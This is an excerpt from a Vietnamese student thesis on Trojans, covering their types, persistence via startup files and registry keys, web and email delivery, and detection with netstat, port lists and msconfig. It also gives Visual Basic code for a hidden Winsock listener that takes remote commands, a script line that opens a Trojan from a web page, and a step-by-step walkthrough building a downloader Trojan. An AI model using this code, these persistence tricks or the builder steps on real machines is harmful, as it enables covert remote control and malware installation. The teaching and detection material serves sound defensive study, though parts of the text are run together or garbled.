Ngày nay với sự phát triển như vũ bão của ngành công nghệ thôngtin thì khái niệm Trojan cũng đã có nhiều sự thay đổi và nhiều cách hiểukhác nhau, gần đây nhất Viện Tiêu chuẩn công nghệ q
Trang 1LỜI NÓI ĐẦU 3
CHƯƠNG 1:TỔNG QUAN VỀ TROJAN 5
1.1.Con ngựa thành Troy –Trojan Horse 5
1.2.Trojan nguy hiểm như thế nào? 6
1.3.Những con đường để máy tính nạn nhân(Victim) nhiễm Trojan 7
1.4.Các dạng Trojan cơ bản 8
1.4.1.Trojan dùng để truy cập từ xa (Remote Access Trojans) 8
1.4.2.Trojan gửi mật khẩu 8
1.4.3.Keyloggers 9
1.4.4.Trojan phá hủy(Destructive) 10
1.4.5.Trojan FTP 10
1.4.6.Trojan tấn công từ chối dịch vụ(Denial of Service) 10
1.4.7.Trojan tiêu diệt phần mềm 10
1.5.Cách thức hoạt động của Trojan 10
1.6.Cách đính kèm Trojan vào Website,Email 16
1.6.1.Cách đính kèm Trojan vào Website 16
1.6.2.Cách đính kèm Trojan vào Email 17
1.7.Kỹ Thuật phát hiện Trojan 18
1.7.1.Phát hiện Port sử dụng bởi Trojans 18
1.7.2.Cách phát hiện các chương trình đang chạy 24
1.7.3 Tìm một chương trình chạy lúc khởi động 25
1.8.Kỹ thuật tạo và gắn Trojan vào các máy trạm 26
18.1.Kỹ thuật tạo Trojan 26
1.8.2.Kỹ thuật gắn Trojan vào máy trạm 37
1.9.Cách phòng chống Trojan 38
CHƯƠNG 2: TỔNG QUAN MẠNG MÁY TÍNH 40
2.1.Mạng máy tính 40
2.2.Mạng LAN 40
2.2.1.Các kiểu Topology của mạng LAN 41
2.3.Các mô hình mạng máy tính 45
2.4.Giao thức TCP 47
2.5.Giao thức UDP 49
2.6.Các cổng giao tiếp 51
CHƯƠNG 3: SOCKET 53
3.1.TỔNG QUAN VỀ SOCKET 53
3.1.1.Khái quát 53
3.1.2.Định nghĩa 54
3.1.3.Nguyên lý hoạt động 54
3.1.4.Socket hỗ trợ TCP 56
3.1.5.Socket hỗ trợ UDP 58
CHƯƠNG 4: XÂY DỰNG CHƯƠNG TRÌNH GIÁM SÁT HỆ THỐNG SỬ DỤNG TROJAN 59
4.1.Phân tích hệ thống 59
4.1.1.Mô hình chung 59
4.1.2.Sơ đồ thuật toán công việc 60
4.1.3.Sơ đồ giao dịch 61
4.1.3.Sơ đồ tuần tự 62
4.2.Thiết kế giao diện, xây dựng chức năng chương trình 65
Trang 24.2.1.Thiết kế giao diện 65
4.2.2.Xây dựng chức năng chương trình 66
KẾT LUẬN 72
TÀI LIỆU THAM KHẢO 73
Trang 3LỜI NÓI ĐẦU
Từ xưa đến nay vấn đề thông tin là cực kỳ quan trọng, làm chủ đượcthông tin là nắm được thành công, nếu không làm chủ được thông tin thì sẽ
bị thất bại Chính vì vậy, có rất nhiều người tìm cách lấy thông tin bằngmọi cách mà Trojan là một công cụ hàng đầu Với ưu điểm: Dung lượngnhỏ, thông minh, dễ sử dụng và hiệu quả cao, Trojan đã thực sự trở thànhmối đe dọa nguy hiểm đối với bất kì một hệ thống nào Tuy nhiên, với sựphát triển vượt bậc của khoa học công nghệ Trojan đã không còn chỉ là vũkhí riêng của Hacker mà còn là công cụ hữu hiệu để cho các nhà quản trịgiám sát hệ thống mạng Việc sử dụng Trojan để giám sát đang ngày càngphổ biến ở các nước có ngành CNTT phát triển Công cụ giám sát này vừađem lại cho người quản trị một hệ thống giám sát hoàn chỉnh, đồng thờilàm tăng khả năng bảo mật an toàn thông tin cho các trao đổi thông tin trênmạng
Trong những năm gần đây, ở nước ta, việc ứng dụng mạng máy tínhvào nhiệm vụ của các tổ chức, đơn vị ngày càng tăng, các ứng dụng đượcxây dựng ngày càng nhiều về số lượng, phạm vi ứng dụng sâu và rộng hơn
và đem lại hiệu quả rõ rệt Bên cạnh những lợi ích to lớn mà mạng và cácdịch vụ, phần mềm trên mạng đem lại thì có một vấn đề hết sức quan trọngmang tính thời sự đặt ra là việc quản lý, điều hành và bảo mật cho các dịch
vụ, các ứng dụng, các thông tin được trao đổi trên đường truyền Đòi hỏingười quản trị phải có một hệ thống với các công cụ giám sát toàn diện,đồng thời phải có những hiểu biết sâu sắc về các phương thức tấn công củaHacker
Từ những yêu cầu có tính cấp thiết trên, em chọn đề tài “Xây dựngcông cụ giám sát hệ thống” làm đề tài cho đồ án tốt nghiệp của mình.Trongquá trình thực hiện, em xin chân thành cảm ơn sự giúp đỡ tận tình của thầy
Trang 4giáo hướng dẫn PGS.TS để em có thể hoàn thành đồ án tốt nghiệp củamình.
Trang 5CHƯƠNG 1:TỔNG QUAN VỀ TROJAN
1.1.Con ngựa thành Troy –Trojan Horse
Thuật ngữ này vào một điển tích cổ, đó là cuộc chiến giữa người HyLạp và người thành Troy Thành Troy là một thành trì kiên cố, quân HyLạp không sao có thể đột nhập được vào Người ta đã nghĩ ra một kế, giả
vờ giảng hòa, sau đó tặng thành Troy một con ngựa gỗ khổng lồ Sau khingựa được đưa vào trong thành, đêm xuống những quân lính từ trong bụngngựa xông ra và đánh chiếm thành từ bên trong
Những tài liệu bảo mật Internet kinh điển định nghĩa thuật ngữ nàytheo nhiều cách khác nhau Nhưng có lẽ cái nổi tiếng nhất là định nghĩađược đưa ra trong RFC(Requests for Comments-một tài liệu Internet đặcbiệt được viết bởi các tác giả trong lĩnh vực phát triển hoặc bảo trìInternet):
Một chương trình Trojan có thể là một chương trình mà làm điều gì
đó hữu ích, hoặc đơn thuần là điều gì đó quan tâm Nhưng nó luôn làm điềubất ngờ, như đánh cắp passwords hoặc copy files mà người dùng khôngbiết
Ngày nay với sự phát triển như vũ bão của ngành công nghệ thôngtin thì khái niệm Trojan cũng đã có nhiều sự thay đổi và nhiều cách hiểukhác nhau, gần đây nhất Viện Tiêu chuẩn công nghệ quốc gia Hoa kỳ(National Institute of Standart and Technology-NIST) đã đưa ra định nghĩa
về Trojan trong tài liệu “Guide to Malware Incident Prevention andHandling-Special Publication 800-83” ban hành tháng 11/2005 và hiện naykhái niệm này đã trở thành phổ biến.Theo NIST:
Trojan Horse: Là loại mã độc hại được đặt theo sự tích “Ngựa
thành Troy” Trojan horse không tự nhân bản tuy nhiên nó lây vào hệ thốngvới biểu hiện rất ôn hoà nhưng thực chất bên trong có ẩn chữa các đoạn mã
Trang 6với mục đích gây hại Trojan có thể lựa chọn một trong 3 phương thức đểgây hại:
bên cạnh đó thực thi các hoạt động gây hại một cách riêng biệt (ví dụnhư gửi một trò chơi dụ cho người dùng sử dụng, bên cạnh đó là mộtchương trình đánh cắp Password)
nhưng sửa đổi một số chức năng để gây tổn hại (ví dụ như mộtTrojan giả lập một cửa sổ login để lấy password) hoặc che dấu cáchành động phá hoại khác (ví dụ như Trojan che dấu cho các tiếntrình độc hại khác bằng cách tắt các hiển thị của hệ thống)
một chương trình không có hại (ví dụ như một Trojan được giớithiệu như là một chò chơi hoặc một tool trên mạng, người dùng chỉcần kích hoạt file này là lập tức dữ liệu trên PC sẽ bị xoá hết)
1.2.Trojan nguy hiểm như thế nào?
Nhiều nguời không biết Trojan là gì thì suy nghĩ rằng khi chạychúng, họ không thấy điều gì xảy ra, và họ cho rằng Trojan không có gìnguy hiểm, bởi vì máy tính của họ vẫn làm việc và tất cả dữ liệu vẫn còn
đó, nếu đó là một con virus thì dữ liệu đã có thể mất sạch hay máy đãngưng hoạt động hoặc gặp sự cố
Khi máy nạn nhân(Victim) bị nhiễm Trojan thì tất cả dữ liệu trênmáy đều có thể bị nguy hiểm, thường thì khi Trojan nhiễm vào máy nó sẽgây ra các tác hại điển hình sau:
- Xóa hay viết lại các dữ liệu trên máy tính
- Làm hỏng chức năng của các tệp
- Lây nhiễm các phần mềm ác tính khác như là virus
- Cài đặt để máy có thể bị điều khiển bởi máy khác
Trang 7- Đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác
- Ăn cắp thông tin như là mật khẩu và số thẻ tín dụng
- Đọc các chi tiết tài khoản ngân hàng và dùng vào các mục tiêuphạm tội
- Cài đặt lén các phần mềm chưa được cho phép
Hình 1.1:Hacker sử dụng Trojan tấn công
1.3.Những con đường để máy tính nạn nhân(Victim) nhiễm Trojan
Victim có thể bị nhiễm virus từ rất nhiều nguồn sau đây là một sốhình thức phổ biến:
- Qua các ứng dụng CHAT online.
- Qua các file được đính kèm trên Mail…
- Qua tầng vật lý như trao đổi dữ liệu qua USB, CD, HDD…
- Khi chạy một file bị nhiễm Trojan
- Qua những chương trình nguy hiểm
- Từ những trang web không tin tưởng hay những website cung cấpphần mềm miễn phí
- … v.v.v
- Rất nhiều lý do nhưng quan trọng là chúng ta phải cẩn thận trướccác mánh khóe, thủ đoạn của các hacker
Ví dụ đơn giản của một Trojan horse là một chương trình mang tên
“SEXY.EXE” được đăng trên một trang Web với hứa hẹn của “ảnh hấpdẫn” nhưng khi chạy chương trình này lại xóa tất cả tệp trong máy tính vàhiển thị các câu trêu chọc
Trang 81.4.Các dạng Trojan cơ bản
Có nhiều dạng Trojan nhưng chủ yếu được chia ra thành các dạng cơbản sau:
1.4.1.Trojan dùng để truy cập từ xa (Remote Access Trojans)
Hiện nay, Trojan loại này được sử dụng rất nhiều Chức năng chínhcủa Trojan này là mở một cổng trên máy nạn nhân để hacker có thể quaylại truy cập vào máy nạn nhân
Những con Trojan này rất dễ sử dụng.Chỉ cần nạn nhân bị nhiễmTrojan và hacker có IP của nạn nhân thì hacker đã có thể truy cập toànquyền trên máy nạn nhân.Tùy loại Trojan mà chức năng của nó khácnhau(download, upload file, thực hiện lệnh …)
Các Trojan nổi tiếng loại này như : netbus, back orifice …
Hình 1.2: Trojan NetBus 1.701.4.2.Trojan gửi mật khẩu
Mục đích của Trojan này là đọc tất cả mật khẩu lưu trong cache vàthông tin về máy Victim rồi gửi về cho hacker mỗi khi Victim online
Trang 9Những mật khẩu cho IRC, FTP, HTTP hoặc các ứng dụng khác yêu cầungười dùng phải nhập login và Password hầu hết các địa chỉ email gửi vềthường nằm ở trên các website free.
Các Trojan nổi tiếng loại này như: barok, kuang, bario …
1.4.3.Keyloggers
Đây là loại Trojan rất đơn giản Nó chỉ làm một việc đó là ghi lại tất
cả các hành động trên bàn phím của Victim và sau đó gửi cho kẻ tấn công(Attacker) tìm kiếm password hoặc các dữ liệu nhạy cảm Hầu hết chúngthực hiện cả 2 chức năng ghi lại khi online và offline và tất nhiên sau đóchúng được cấu hình để gửi file log tới một địa chỉ email hàng ngày
Các Trojan nổi tiếng loại này như: Perfect Keylogger,sys…
Hình 1.3: Perfect Keylogger
Trang 101.4.4.Trojan phá hủy(Destructive)
Loại Trojan này chỉ có một chức năng là phá hủy và xóa các files.Chúng rất đơn giản và dễ sử dụng Chúng có thể tự động xóa tất cả các file
lõi của hệ thống (ví dụ như file: dll, ini,.exe,…) trên máy của Victim.
Trojan này thường được kích hoạt bởi kẻ tấn công hoặc đôi khi chúng hoạtđộng như một quả bom hẹn giờ
1.4.5.Trojan FTP
Loại Trojan này sẽ mở cổng 21 trên máy của Victim và để cho tất cảmọi người kết nối đến máy tính của Victim mà không có mật khẩu và họ sẽtoàn quyền tải bất kỳ dữ liệu nào xuống
1.4.6.Trojan tấn công từ chối dịch vụ(Denial of Service)
Loại Trojan này ngày nay rất hay được sử dụng, nó cho phép kẻ tấncông có đủ sức mạnh để tấn công từ chối dịch vụ với Victim Ý tưởngchính của nó là nếu chúng ta có 200 người dùng ADSL bị nhiễm và bắt đầutấn công Victim cùng một lúc, nó sẽ phát sinh một số lượng lớn lưu lượng(nhiều hơn băng thông của Victim trong trường hợp này) truy cập tớiInternet sẽ bị ngừng trệ WinTrinoo là một tool tấn công từ chối dịch vụđược sử dụng phổ biến hiện nay
1.4.7.Trojan tiêu diệt phần mềm
Đây là loại Trojan được tích hợp rất nhiều chức năng, nhưng cũng cónhững chương trình tách biệt đó là các chương trình diệt ZoneAlarm,Norton Anti-Virus và nhiều chương trình khác( thông thường là cácchương trình anti-virus/firewall) bảo vệ máy Victim Khi các chương trìnhnày bị tiêu diệt, kẻ tấn công sẽ truy cập vào máy của Victim, thực hiện cáchoạt động bất hợp pháp
1.5.Cách thức hoạt động của Trojan
Trojan thường gồm 2 phần, 1 phần là Client và 1 phần là Server KhiVictim chạy Server trên máy của mình, kẻ tấn công sẽ sử dụng Client để
Trang 11kết nối tới Server và bắt đầu sử dụng Trojan Giao thức TCP/IP là giao thứcthường được sử dụng để kết nối, nhưng một số Trojan sử dụng giao thứcUDP Khi Server bắt đầu chạy trên máy của Victim, nó sẽ ẩn ở một nơi nào
đó trong máy của Victim, lắng nghe kết nối trên một vài cổng chờ đợi kếtnối từ kẻ tấn công
một số cách (đây là những nơi mà Win ưu tiên khởi động trước ):
- Trong các Autostart Folder: ví dụ file khởi động của Trojan làTrojan.exe thì C:\Windows\Start Menu\Programs\startup\Trojan.exe
- Trong file C:\windows\Win.ini tại dòng lệnh load= Trojan.exehoặc run = Trojan.exe
- Trong file c:\windows\system.ini sau dòng lệnh shell =Explorer.exe Trojan.exe Trojan sẽ tự động chạy khi fileExplorer.exe chạy
- Trong Autoexec.bat :c:\ \Trojan.exe
- Explorer Startup : c\explorer.exe, c:\ \Trojan.exe
- Tạo một khóa trong registry :
Trang 12Một khóa với giá trị "%1 %*" sẽ được đặt tại đó và nếu có một vàifile chạy đặt tại đó, nó sẽ chạy mỗi khi bạn mở một file nhị phân.Nó được
sử dụng như: Trojan.exe "%1 %*" điều này sẽ khởi động Trojan
- Trong ActiveX
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName] StubPath=C:\directory\Trojan.exe
Trang 13%SystemDrive%\Documents and Settings\All Users\Templates\PowerPoint temlates.exe
Việc tiếp theo là nó sẽ làm ẩn đi tính năng registry tools and thefolder options trong Window Explorer :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\policies\Explorer\"NoFolderOptions" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\ Policies\System\"DisableRegistryTools" = "1"
Trang 14HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ Main\"Window Title" = "Freak-X Browser"
Tự động thêm vào regedit những khóa sau :
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ Main\"Local Page" = "[http://]www.hentaisailormoon.com[REMOVED]" HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ Main\"Start Page" = "[http://]www.hentaisailormoon.com[REMOVED]" HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\ Explorer\Advanced\"Hidden" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\ Explorer\Advanced\"HideFileExt" = "1"
Khởi tạo thêm nhưng file sau vào tất cả các ổ đĩa
Khi hoạt động con Trojan này sẽ copy file thực thi (*.exe) của nóvào thư mục gốc của Windows , chi tiết cụ thể như sau :
Code:
%WinDir%\iexplorer.exe
Trang 15Phòng trường hợp người sử dụng dùng các chương trình quản lýkhởi động để ngăn không cho nó khởi động cùng Window thì nó sẽ thêmmột đường dẫn để file thực thi trong registry hệ thống :
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IE" = "%WinDir%\iexplorer.exe".
Sau khi xâm nhập vào máy tính và khi nạn nhân kết nối vào Internet
nó sẽ download các file từ những URL mà người viết con trojan này đãđịnh như sau :
http://www.site*****.com/top7_1.gif
http://www.site*****.com/top7_2.gif
http://www.sugo*****.kr/bbs/icon/pri ame/top7_1.gif
http://www.sugo*****.kr/bbs/icon/pri ame/top7_2.gif
Các file sau khi download về sẽ được lưu tại các vị trí sau :
C:\Documents and Settings\All Users\winsql.dat
C:\Documents and Settings\All Users\DirectX.aud
C:\Documents and Settings\All Users\services.exe
C:\Documents and Settings\All Users\comctl64.dll
Khi nó đã download thành công các file cần thiết thì các file này sẽbắt đầu hoạt động
Khôn ngoan hơn, con Trojan này cũng mở một đường link mà ngườidùng không hề biết hay đồng ý :
http://pag*****.terra.com.br/arte/so /cartao059.htm
Để giúp cho việc kết nối giữa Trojan và chủ nhân của nó thì một sốTrojan sau này phần dữ liệu của nó còn lưu thêm 2 phần để kiểm tra tên vàmật khẩu
1.6.Cách đính kèm Trojan vào Website,Email
1.6.1.Cách đính kèm Trojan vào Website
Trang 16Có rất nhiều cách để đính kèm Trojan vào Website sau đây là một sốhình thức phổ biến:
Ví dụ:
Chèn đoạn mã sau: <SCRIPT language=javascript> open(“địa chỉ
con Trojan”);</SCRIPT>.
Đoạn mã trên chèn vào thẻ body của 1 trang website, khi nạn nhân
mở website Trojan sẽ mở ra và yêu cầu người lướt website mở ra
Nổi tiếng nhất là phần mềm GodWill phần mềm này cho phép thựchiện nhiều chức năng đính kèm Trojan
Hình 1.4: Godwill phần mềm đính kèm Trojan1.6.2.Cách đính kèm Trojan vào Email
Trang 17Để đính Trojan vào email có rất nhiều cách thông thường kẻ tấncông thường lợi dụng các lỗ hổ hoặc sự chủ quan không đề phòng củangười sử dụng để đính Trojan.
10000")}}
</SCRIPT>
Ngoài ra hiện nay kẻ tấn công còn thường sử dụng công cụ
“Badblood” Badblood là thuật ngữ mới được phát hiện bởi Marklord, sựphát hiện này giúp có thể chạy file đính kèm (attached files) trong mail, mà
hidden, nó không chỉ ảnh hưởng đến Outlook Express mà còn làm ảnhhưởng tới tất cả những người sử dụng ỊE.0 với Outlook Express đi kèm(install khi cài windows)
Và đây chính là lổ hổng bảo mật để gửi Trojan
1.7.Kỹ Thuật phát hiện Trojan
Trang 18Có ba nguyên lý của bất kỳ chương trình Trojan nào:
- Một Trojan muốn hoạt động phải lắng nghe các request trên mộtcổng nào đó
- Một chương trình đang chạy sẽ phải có Tên trong Process List
Một chương trình Trojan sẽ luôn chạy cùng lúc khi máy tính khởi động.1.7.1.Phát hiện Port sử dụng bởi Trojans
- Dùng câu lệnh Netstat – an trong Windows để biết hệ thống đanglắng nghe trên các Port nào
Hình 1.5: Netstat -an
+ Hình trên chúng ta thấy có Port 666 là Port của Trojan RST
- Dùng phần mềm Fport, TCPView: Để xem toàn bộ các Port đang sửdụng và chương trình nào đang sử dụng Port nào Từ đây có thể kiểmtra các dịch vụ mạng với những Port nghi ngờ có thể dùng FireWall
để đóng lại
Trang 19Hình 1.6:TCPView theo dõi cổng kết nốiMột số cổng mà Trojan thường sử dụng:
Silencer|1001Shivka-Burka|1600SpySender|1807Shockrave|1981WebEx|1001
Trang 24Silencer | 1001Striker | 2565TheSpy | 40412TrojanCow | 2001UglyFtp | 23456WebEx |1001Backdoor | 1999Phineas | 2801Psyber Streaming Server | 1509Indoctrination | 6939Hackers Paradise | 456Doly Trojan | 1011FTP99CMP | 1492Shiva Burka | 1600Remote Windows Shutdown | 53001
BigGluck, | 34324NetSpy DK | 31339Hack?99 KeyLogger | 12223
iNi-Killer | 9989ICQKiller | 7789Portal of Doom | 9875Firehotcker | 5321Master Paradise |40423
BO jammerkillahV | 1211.7.2.Cách phát hiện các chương trình đang chạy
Đa số các Trojan đều có chức năng tắt hiển thị trong Task Manager
vì vậy mà người sử dụng không thể nhìn thấy chúng khi vào Task Manager
Để có thể xem được tất cả các tiến trình đang chạy có thể sử dụng các phần
Trang 25mềm có chức năng hiển thị tất cả các tiến trình(Process) đang chạy dùchúng đang chạy ở chế độ ẩn.
Nổi bật nhất trong số này là phần mềm Process Viewer:
Dùng phần mềm Process Viewer tất cả các Process sẽ được hiển thị
dù có đang chạy chế độ ẩn và không hiện trên Task Manager của Windows
Hình 1.7:Process Viewer theo dõi các tiến trình1.7.3 Tìm một chương trình chạy lúc khởi động
- Trong Startup.
- Trong Registry: Đa số sẽ nằm tại đây: Để kiểm tra sử dụng câu lệnhMsconfig trong Table Startup chương trình nào muốn chạy tự động sẽ phảinằm tại đây
Ví dụ: file RunMe.exe chạy lúc khởi động
Trang 26Hình 1.8:MSCONFIG
1.8.Kỹ thuật tạo và gắn Trojan vào các máy trạm
18.1.Kỹ thuật tạo Trojan
Trojan được tạo bởi các lập trình viên và có thể được tạo ra từ nhiềungôn ngữ như: Perl, visual c, visualbasic, delphi, autoit…
Các Trojan điển hình cho các ngôn ngữ này như:
Trang 27Hình 1.9: Trojan Optix Pro lập trình bằng Delphi
Trang 29Hình 1.11: CIA trojan lập trình bằng Visual Basic
Trang 30Hình 1.12 : MoSucker Trojan lập trình bằng Visual Basic
Cách tạo một con Trojan đơn giản
Trang 31Để lắng nghe kết nối tới sử dụng WinSock OCX, nhờ có nó
mà có thể tạo 1 sự điều khiển từ xa đối với Victim
Ví dụ Trojan lắng nghe trên cổng 2999 khi khởi động:
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
winsock1.LocalPort = 2999winsock1.RemotePort = 455
winsock1.Listen
EndSub
Nếu máy tính Victim chấp nhận mở Port này, chấp nhận cả việc nốimạng với IP thì nó sẽ xuất hiện 1 cửa trống cho Attacker đi vào Bây giờAttacker có thể gởi cho Victim bất kì data nào, cũng có thể là 1 lệnh
Ví dụ lệnh mở ổ CD:
Private Sub tcp_DataArrival(ByVal BytesTotal As Long)
Dim msg As Stringtcp.GetData msgSelect Case msgCase "cdopen"
Call mciExecute("Set CDaudio door open") "phải được định nghĩa
Trang 32Private Sub cmdConnect_Click()IpAddy = “địa chỉ Ip máy Victim”
Winsock1.CloseWinisock1.RemotePort = 2999Winsock1.RemoteHost = IpAddyWinsock1.LocalPort = 9999Winsock1.Connect
EndSub
Hiện nay đa số kẻ tấn công sử dụng các công cụ tạo Trojan có sẵn vì chúng vừa nhanh lại vừa hiệu quả, dễ sử dụng ngay cả đối với những kẻ tấncông không mấy hiểu biết về Trojan
Điển hình như : Fweb Downloader Editor, Beast Trojan, Trojan Editor…
Một số công cụ điển hình:
Đây là công cụ tạo Trojan Backdoor để lây nhiễm vào hệ thống của nạn nhân.Tùy vào hoàn cảnh mà Attacker có thể để port nào mở để họ cóthể kết nối tới Mục đích của công cụ này là tạo ra một Trojan mở cổng sau
để Attacker kết nối tới hệ thống của nạn nhân một cách dễ dàng
Giao diện chính của Beast Trojan:
Trang 33Hình 1.13 :Beast TrojanQuá trình sử dụng của Beast Trojan đã được hướng dẫn cụ thểAttacker chỉ cần làm theo là có một con Trojan nguy hiểm.
Fweb Downloader Editor
Đây là công cụ tạo Trojan tự động download hoặc tải về một chươngtrình trên một website nào đó do Attacker chỉ định Mục đích của công cụnày là tự động download một chương trình bất hợp pháp về máy tính củanạn nhân khi họ kích hoạt Trojan này mà không cần sự đồng ý của họ
Đây là giao diện chính của Fweb Downloader Editor
Hình 1.14: Fweb Downloader Editor
Trang 34Phần URL1 hoặc URL2 nhập vào linh hoặc website mà Attackermuốn cho download về máy của nạn nhân (tùy chọn ví dụ
http://www.eccouncil.org/ebook.exe )
Chọn Create FwebD EXE
Phần File name : games.exe (tên tùy chọn) chọn Save
Trang 35Quá trình tạo trojan đã hoàn tất
Đây là trojan vừa được tạo ra
Kích hoạt để kiểm tra trojan chạy có tốt không
Trang 36Trojan chạy tốt không báo lỗi gì Kiểm tra trong Process củaWindows xem có thấy Trojan đang chạy không Đây là Trojan đang chạyđược liệt kê trong Process.
Vậy là Trojan chạy tốt khi hiện ra cuốn ebook của Eccouncil đúngvới yêu cầu
